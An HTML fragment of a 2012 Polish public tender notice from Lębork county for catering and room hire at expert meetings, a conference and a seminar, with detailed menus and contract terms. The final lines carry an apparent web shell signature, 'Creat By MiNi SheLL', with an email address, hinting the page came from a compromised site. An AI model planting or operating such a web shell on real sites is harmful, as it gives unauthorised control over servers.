<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.powiat.leborski.samorzady.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie zamawiającego.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2012 godzina 12:00, miejsce: Biuro Obsługi Interesanta w Starostwie Powiatowym w Lęborku, ul. Czołgistów 5, 84-300 Lębork.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego (Program Operacyjny Kapitał Ludzki, Priorytet VII Promocja integracji społecznej, Działanie 7.2 Przeciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej).</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> CATERING NA SPOTKANIA ZESPOŁU EKSPERTÓW.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług cateringowych podczas 8 spotkań zespołu ekspertów w Starostwie Powiatowym w Lęborku. Danie obiadowe i deserowe podawane będzie w formie szwedzkiego stołu. 

1.	Terminy i czas trwania

Świadczenie usług cateringowych podczas spotkań zespołu ekspertów  będzie odbywać się w 2012 i 2013 roku - 8 spotkań w przewidywanych miesiącach VIII, X, XI, XII 2012 roku oraz I i II 2013 roku- - wg ustalonego harmonogramu spotkań. W przypadku braku możliwości zorganizowania spotkania w którymś z ww. miesięcy spotkanie zorganizowane będzie w innym miesiącu, jednakże ostatnie spotkanie przypada na miesiąc luty 2013 roku.  
O dokładnej dacie, miejscu i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem.

2.	Przewidywana liczba uczestników spotkań
Planowana liczba osób uczestniczących w każdym spotkaniu - 15 osób. 
Każde spotkanie będzie zorganizowane w jednym dniu i przewidywany okres ich trwania szacuje się na 4 godziny. 

3.	Miejsce świadczenia usług:
Świadczenie usług cateringu odbywać się będzie na terenie Lęborka, w Sali wyposażonej w stoły, tak aby możliwe było serwowanie posiłków w formie szwedzkiego stołu. Salę i dostęp do sali oraz stoły zapewnia Zamawiający.

4.	W ramach świadczenia usług cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania spotkania (serwisu kawowego) oraz przerwy obiadowej
12) zebrania naczyń i uprzątnięcia stołów najpóźniej na 30 minut po opuszczeniu sali przez ekspertów
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca na każde spotkanie przygotuje:

a)	tzw. serwis kawowy do korzystania bez ograniczeń, na który składają się:
- Napoje gorące bez ograniczeń, w tym:
- - Kawy czarnej rozpuszczalnej 
- - Herbaty czarnej tradycyjnej oraz owocowej 
- - Dodatki do napojów bez ograniczeń: cukier, mleczko lub śmietanki do kawy w płynie bez ograniczeń, cytryny w plasterkach do herbaty 
- Napoje zimne bez ograniczeń, w tym:
- - Wody mineralnej niegazowanej 
- - Soków owocowych (co najmniej 2 rodzaje) 
- Drobne przekąski bez ograniczeń:
- Owoce - co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) 
- Ciastka, cukierki - co najmniej po 3 rodzaje
- Serwis kawowy musi być (przygotowany na 30 minut przed rozpoczęciem spotkania, 
z możliwością korzystania aż do zakończenia spotkania).

b)	danie deserowe:
- 3 rodzaje ciast - typu: sernik, jabłecznik, z owocami - każdego typu minimum po 10 porcji po 100 gram każda porcja
- 1 rodzaju małego deseru - różnorodnego dla każdego spotkania, np. galaretka z owocami, lody, słodki naleśnik

6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania, artykuły wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i ich dostawy.
c)	Zamawiający będzie płacił za wykonaną usługę cateringową po każdym spotkaniu w kwocie wynikającej z formularza ofertowego (liczonej jako łączna cena brutto podzielona przez 8) na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1, 55.32.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 28.02.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> WYNAJEM SAL WRAZ Z CATERINGIEM NA KONFERENCJĘ INFORMACYJNO-PROMOCYJNĄ NA ROZPOCZĘCIE REALIZACJI PROJEKTU.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem 2 sal (sali konferencyjnej oraz sali cateringowej umieszczonych w 1 budynku) połączony ze świadczeniem usługi cateringowej podczas konferencji informacyjno-promocyjnej na rozpoczęcie realizacji projektu na terenie miasta Lęborka. 

1.	Terminy i czas trwania

Konferencja będzie jednodniowa i przewidywany okres jej trwania szacuje się na 4 godziny we wrześniu 2012 roku. 
O dokładnej dacie i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem. 

2.	Przewidywana liczba uczestników konferencji:
Szacunkowa liczba uczestników konferencji to 80 osób. 

3.	Miejsce świadczenia usług:
Wykonawca zapewni wynajem sal:
- sali konferencyjnej, wyposażonej w krzesła w ilości dostosowanej do przewidywanej liczby osób oraz sprzęt multimedialny niezbędny do przeprowadzenia konferencji (ekran, projektor multimedialny oraz laptop).  Wykonawca zapewni także obsługę techniczną sali i sprzętu. 
- osobnej sali na catering w formie stołu szwedzkiego, wyposażonej co najmniej w stoły, przystosowanej do podanej ilości uczestników konferencji.
Obie sale muszą znajdować się w tym samym budynku.
O miejscu realizacji usługi Wykonawca poinformuje Zamawiającego na piśmie w dniu podpisania umowy, jest zobowiązany do uzyskania oficjalnej zgody na organizację konferencji w zaproponowanym miejscu. 
Świadczenie usługi wynajmu sali i organizacji cateringu odbywać się będzie na terenie Lęborka w miejscu o wysokim standardzie, spełniającym wszystkie wymagania bezpieczeństwa i higieny pracy stawiane pomieszczeniom, w których organizowane są konferencje. Pomieszczenia winny charakteryzować się dobrym stanem technicznym (min. podłogi winny być równe i bezpieczne, ściany czyste i estetyczne, krzesła i stoliki w dobrym stanie technicznym i estetycznym). Temperatura w pomieszczeniach nie może być niższa niż 18 stopni Celsjusza.
Wykonawca zapewni miejsce na przechowywanie odzieży wierzchniej i nadzoru nad pozostawioną odzieżą.

4.	W ramach świadczenia usługi cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) ewentualnego transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania konferencji
12) zebrania naczyń i uprzątnięcia stołów 
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca przygotuje catering na konferencję w formie stołu szwedzkiego.

Menu musi składać się co najmniej z:
- Napojów gorących, w tym:
- - kawy czarnej rozpuszczalnej w ilości minimum 200 ml na osobę
- - herbaty czarnej tradycyjnej w ilości minimum 200 ml na osobę
- Cukru bez ograniczeń, mleczka lub śmietanki do kawy w płynie bez ograniczeń, cytryna w plasterkach do herbaty i serwetki dla wszystkich uczestników
- Napojów zimnych, w tym:
- - wody mineralnej niegazowanej - w ilości minimum 150 ml na osobę
- - soków owocowych (co najmniej 2 rodzaje) - w ilości łącznie minimum 200 ml na osobę
- 3 dania na zimno:
- - mix pieczonych mięs i pasztetów - łącznie minimum 5 kg
- - sałatka, co najmniej 3 rodzaje, np. grecka, jarzynowa, ryżowa - łącznie minimum 75 gram na osobę
- - jaja faszerowane - minimum 1 sztuka (połówka) na osobę
Do dań na zimno Wykonawca zapewni świeże pieczywo: białe i ciemne w ilości co najmniej 2 kromki na osobę oraz masło.
- 4 dania na gorąco:
- - zupa:
- - - barszcz czerwony podawany z pasztecikiem/zupa gulaszowa/ strogonow - minimum 10 litrów
- - 3 rodzaje dań mięsnych:
- - - kęski drobiowe - minimum 100 gram na osobę
- - - pulpeciki- minimum 100 sztuk po 75 gram 
- - - krokiety mięsne/grzybowe- łącznie minimum 65 sztuk
Do dań mięsnych na gorąco Wykonawca zapewni ziemniaczki pieczone i frytki - łącznie w ilości minimum 200 gram na osobę.
- Dania deserowe:
- - ciasta - co najmniej 3 rodzaje, typu: sernik, jabłecznik, z owocami - każdego typu minimum po 40 porcji po 100 gram każda porcja
- - owoce- co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) - łącznie minimum 5 kg


6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania, artykuły wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne inne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i realizacji usługi.
c)	Zamawiający będzie płacił za wykonaną usługę wynajmu sali i cateringu po odbyciu konferencji na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1, 55.32.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> WYNAJEM SAL WRAZ Z CATERINGIEM NA SEMINARIUM TEMATYCZNE (KONSULTACJE SPOŁECZNE) - DZIAŁANIE UPOWSZECHNIAJĄCO - WŁĄCZAJĄCE.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wynajem 2 sal (sali seminaryjnej oraz sali cateringowej umieszczonych w 1 budynku) połączony ze świadczeniem usługi cateringowej podczas seminarium na terenie miasta Lęborka.

1.	Terminy i czas trwania

Seminarium będzie jednodniowe i przewidywany okres jego trwania szacuje się na 4 godziny w styczniu 2013 roku. 
O dokładnej dacie i godzinie realizacji usługi Zamawiający poinformuje Wykonawcę z co najmniej 7 dniowym wyprzedzeniem. 

2.	Przewidywana liczba uczestników konferencji:
Szacunkowa liczba uczestników seminarium to 50 osób. 

3.	Miejsce świadczenia usług:
Wykonawca zapewni wynajem sal:
- sali seminaryjnej, wyposażonej w krzesła w ilości dostosowanej do przewidywanej liczby osób oraz  sprzęt multimedialny niezbędny do przeprowadzenia seminarium (ekran, projektor multimedialny oraz laptop). Wykonawca zapewni także obsługę techniczną sali i sprzętu. 
- osobnej sali na catering w formie stołu szwedzkiego, wyposażonej co najmniej w stoły, przystosowanej do podanej ilości uczestników seminarium.
Obie sale muszą znajdować się w tym samym budynku.
O miejscu realizacji usługi Wykonawca poinformuje Zamawiającego na piśmie w dniu podpisania umowy, jest zobowiązany do uzyskania oficjalnej zgody na organizację seminarium w zaproponowanym miejscu. 
Świadczenie usługi wynajmu sali i organizacji cateringu odbywać się będzie na terenie Lęborka w miejscu o wysokim standardzie, spełniającym wszystkie wymagania bezpieczeństwa i higieny pracy stawiane pomieszczeniom, w których organizowane są konferencje/seminaria. Pomieszczenia winny charakteryzować się dobrym stanem technicznym (min. podłogi winny być równe i bezpieczne, ściany czyste i estetyczne, krzesła i stoliki w dobrym stanie technicznym i estetycznym). Temperatura w pomieszczeniach nie może być niższa niż 18 stopni Celsjusza.
Wykonawca zapewni miejsce na przechowywanie odzieży wierzchniej i nadzoru nad pozostawioną odzieżą.

4.	W ramach świadczenia usługi cateringu Wykonawca zobowiązany jest do:
1) przygotowania, dowozu i podania zamawianych posiłków i artykułów spożywczych,
2) świadczenia usług cateringu wyłącznie przy użyciu produktów spełniających normy jakości produktów spożywczych,
3) dostaw w odpowiednich, czystych pojemnikach, zapewniających zabezpieczenie przedmiotu dostawy przed wpływem jakichkolwiek szkodliwych czynników,
4) ewentualnego transportu przedmiotu zamówienia oraz podanie go zgodnie z wymaganiami sanitarnymi dotyczącymi żywności i wyżywienia zbiorowego 
5) przestrzegania przepisów prawnych w zakresie przechowywania i przygotowywania artykułów spożywczych, m.in. ustawy z dnia 25.08.2006r. o bezpieczeństwie żywności i żywienia (t.j. Dz. U. z 2010 r., Nr 136, poz. 914)
6) świadczenie usług cateringowych musi odbywać się na zastawie porcelanowej lub szklanej (wszystkie niezbędne naczynia zapewnia Wykonawca) z użyciem sztućców ze stali nierdzewnej, serwetek jednorazowych oraz obrusów materiałowych
7) zapewnienia wszystkich niezbędnych naczyń
8) przygotowania dekoracji stołów i estetycznego podawania posiłków
9) zapewnienia termosów/warników i innego niezbędnego sprzętu oraz pojemników jednorazowych na resztki po spożytym posiłku
10) bieżącej obsługi stołu szwedzkiego podczas trwania seminarium
12) zebrania naczyń i uprzątnięcia stołów 
13) usunięcia odpadków i śmieci po wykonanej usłudze 

5.	Wykonawca przygotuje catering na seminarium w formie stołu szwedzkiego.

Menu musi składać się co najmniej z:
- Napojów gorących, w tym:
- - kawy czarnej rozpuszczalnej w ilości minimum 200 ml na osobę
- - herbaty czarnej tradycyjnej w ilości minimum 200 ml na osobę
- Cukru bez ograniczeń, mleczka lub śmietanki do kawy w płynie bez ograniczeń, cytryna w plasterkach do herbaty i serwetki dla wszystkich uczestników
- Napojów zimnych, w tym:
- - wody mineralnej niegazowanej - w ilości minimum 150 ml na osobę
- - soków owocowych (co najmniej 2 rodzaje) - w ilości łącznie minimum 200 ml na osobę
- 3 dania na zimno:
- - mix pieczonych mięs i pasztetów - łącznie minimum 3 kg
- - sałatka, co najmniej 3 rodzaje, np. grecka, jarzynowa, ryżowa - łącznie minimum 75 gram na osobę
- - jaja faszerowane - minimum 1 sztuka (połówka) na osobę
Do dań na zimno Wykonawca zapewni świeże pieczywo: białe i ciemne w ilości co najmniej 2 kromki na osobę oraz masło.
- 3 dania na gorąco:
3 rodzaje dań mięsnych:
- - kęski drobiowe - minimum 100 gram na osobę
- - pulpeciki- minimum 70 sztuk po 75 gram 
- - krokiety mięsne/grzybowe- łącznie minimum 45 sztuk
Do dań mięsnych na gorąco Wykonawca zapewni ziemniaczki pieczone i frytki - łącznie w ilości minimum 200 gram na osobę.
- Dania deserowe:
- - ciasta - co najmniej 3 rodzaje, typu: sernik, jabłecznik, z owocami - każdego typu minimum po 25 porcji po 100 gram każda porcja
- - owoce- co najmniej 3 rodzaje (typu: banany, mandarynki, winogrona) - łącznie minimum 3 kg


6.	Pozostałe postanowienia:

a)	Menu musi być zgodne z wymaganiami Zamawiającego i zawierać co najmniej dania wskazane w szczegółowym przedmiocie zamówienia. Wykonawca może dodać do menu swoje własne inne niezbędne propozycje, z zastrzeżeniem, że kwota określona w formularzu ofertowym obejmuje wszystkie rabaty oraz wszystkie koszty związane z zamówieniem.
b)	Zamawiający zastrzega sobie prawo oceny i weryfikacji wszystkich parametrów zleconej usługi - na każdym etapie oraz w każdej chwili w miejscu przygotowywania posiłków i realizacji usługi.
c)	Zamawiający będzie płacił za wykonaną usługę wynajmu sali i cateringu po odbyciu seminarium na podstawie poprawnie wystawionej faktury VAT/rachunku przez Wykonawcę w terminie 14 dni od dnia jej doręczenia Zamawiającemu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 70.22.00.00-9, 55.32.10.00-6, 55.32.20.00-3, 55.52.00.00-1, 55.32.00.00-9, 55.30.00.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.01.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com